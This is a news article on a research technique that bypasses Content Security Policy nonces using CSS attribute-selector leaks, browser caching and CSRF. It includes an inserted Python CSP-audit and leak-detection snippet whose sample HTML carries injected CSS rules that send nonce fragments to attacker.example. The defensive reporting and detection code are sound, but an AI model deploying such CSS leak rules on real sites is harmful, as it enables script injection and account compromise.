
Researchers Exploit HTML Injection to Bypass Content Security Policy

Security researchers have demonstrated a sophisticated method to bypass Content Security Policy (CSP) nonces, a widely used web security mechanism designed to prevent cross-site scripting (XSS) attacks.

The technique combines browser caching behaviour with CSS injection to circumvent one of the web's most trusted security features.

Content Security Policy serves as a critical defense layer that prevents malicious scripts from executing on websites by requiring scripts to include a unique, randomly generated “nonce” value.

This measure has been considered highly effective because each page load generates a new nonce, which in theory makes it impossible for attackers to predict or reuse the value.

The attack begins by exploiting HTML injection vulnerabilities to insert malicious CSS code that can extract nonce values from web pages.

Researchers discovered that while CSP effectively blocks unauthorized scripts, it often permits CSS stylesheets to load without restriction, creating an unexpected attack vector.

The technique uses CSS attribute selectors to systematically leak portions of the nonce value through background image requests.

By crafting CSS rules that match specific character combinations within the nonce, attackers can reconstruct the complete value through multiple HTTP requests.

For example, a selector such as script[nonce*="abc"] triggers a network request only when its attribute condition matches part of the nonce, so attackers can piece together the full string request by request.

Figure: Network tab showing /profile is fetched twice

Figure: The final HTML we see loaded is still the first one that leaked using CSS (green), not our XSS (red)

“The nonce protection mechanism only applies to the nonce attribute itself, but the same value appears in other locations like the CSP meta tag content, which remains vulnerable to CSS-based extraction,” the researchers explained.
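As an added illustration (not code from the article or the researchers), the following Python audits a page for the two weaknesses described above: a style-src that lets injected stylesheets load, and a nonce repeated in a CSP meta tag where CSS attribute selectors can read it. It also flags nonce-based script-src without 'strict-dynamic', which the article later recommends. The HTML, the nonce value and the attacker.example hostname are constructed sample input.

```python
import re

# Constructed sample page: nonce-gated scripts but unrestricted stylesheets, the
# nonce echoed in a <meta> tag, and an injected stylesheet probing that meta tag.
SAMPLE_HTML = """
<meta http-equiv="Content-Security-Policy"
      content="script-src 'nonce-r4nd0m' 'strict-dynamic'; style-src *">
<script nonce="r4nd0m">init()</script>
<style>
meta[content*="nonce-r4"] { background: url(https://attacker.example/leak?r4); }
meta[content*="nonce-r5"] { background: url(https://attacker.example/leak?r5); }
</style>
"""

def parse_csp(policy: str) -> dict:
    """Split a CSP string into {directive: [source expressions]}."""
    out = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            out[tokens[0].lower()] = tokens[1:]
    return out

def csp_from_meta(html: str):
    """Return the policy carried in a CSP <meta> tag, or None if delivered by header."""
    m = re.search(r'<meta[^>]*http-equiv="Content-Security-Policy"[^>]*content="([^"]*)"',
                  html, re.I)
    return m.group(1) if m else None

def audit_csp(policy: str, delivered_via_meta: bool) -> list:
    """Findings that make the CSS-based nonce leak possible or more damaging."""
    d = parse_csp(policy)
    script = d.get("script-src", d.get("default-src", []))
    style = d.get("style-src", d.get("default-src", []))
    uses_nonce = any(s.startswith("'nonce-") for s in script)
    findings = []
    if not style or "*" in style or "'unsafe-inline'" in style:
        findings.append("style-src permits injected stylesheets")
    if uses_nonce and "'strict-dynamic'" not in script:
        findings.append("script-src uses a nonce without 'strict-dynamic'")
    if uses_nonce and delivered_via_meta:
        findings.append("nonce exposed in meta content attribute; deliver CSP as an HTTP header")
    return findings

# Attribute selector on nonce/content whose rule body issues a url() request.
LEAK_RULE = re.compile(r'\[(?:nonce|content)[\^\$\*]?=.*?\][^{]*\{[^}]*url\(', re.I)

def find_nonce_leak_rules(html: str) -> list:
    """Return CSS rules that probe a nonce-bearing attribute and fire a request."""
    return [m.group(0) for m in LEAK_RULE.finditer(html)]
```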

Content Security Policy

The most innovative aspect of this attack leverages browser caching mechanisms, specifically the interaction between back/forward cache (bfcache) and disk cache.

Figure: Back/forward cache debugging tool shows failure due to window.open() reference

The researchers discovered that by manipulating browser navigation history, they could force pages to load from disk cache rather than making fresh requests to the server.

This caching behavior creates a critical window of opportunity: attackers can extract the nonce from a cached page while simultaneously updating the malicious payload through separate requests.

The technique exploits cache partitioning rules and uses Cross-Site Request Forgery (CSRF) attacks to modify user data between cache operations.

Figure: Successful alert with matching nonces

By carefully orchestrating the timing of page loads, history navigation, and cache invalidation, attackers can achieve a scenario where an old page with a known nonce loads from cache while fetching updated malicious content from the server.

The researchers successfully demonstrated the technique in a controlled environment and provided detailed proof-of-concept code.

Real-World Implications

Security professionals recommend layering additional CSP directives on top of nonce-based protection, such as 'strict-dynamic', and regularly auditing HTML injection points.

This research has significant implications for web application security. The attack requires two preconditions: the ability to leak nonces through HTML injection, and the ability to deliver the malicious payload separately from the request that generates the nonce.

These conditions are surprisingly common in modern web applications that use asynchronous content loading.

Several cybersecurity experts have already begun testing the method against real-world applications, with some reporting successful bypasses of production CSP implementations.

The research underscores the importance of defense-in-depth strategies rather than relying solely on single security mechanisms.

This discovery represents a significant advancement in web security research and highlights the continuing evolution of attack techniques against modern browser security features.


Ethan Brooks

Ethan Brooks is a Senior cybersecurity journalist passionate about threat intelligence and data privacy. His work highlights cyber attacks, hacking, security culture, and cybercrime with The Cyber News.
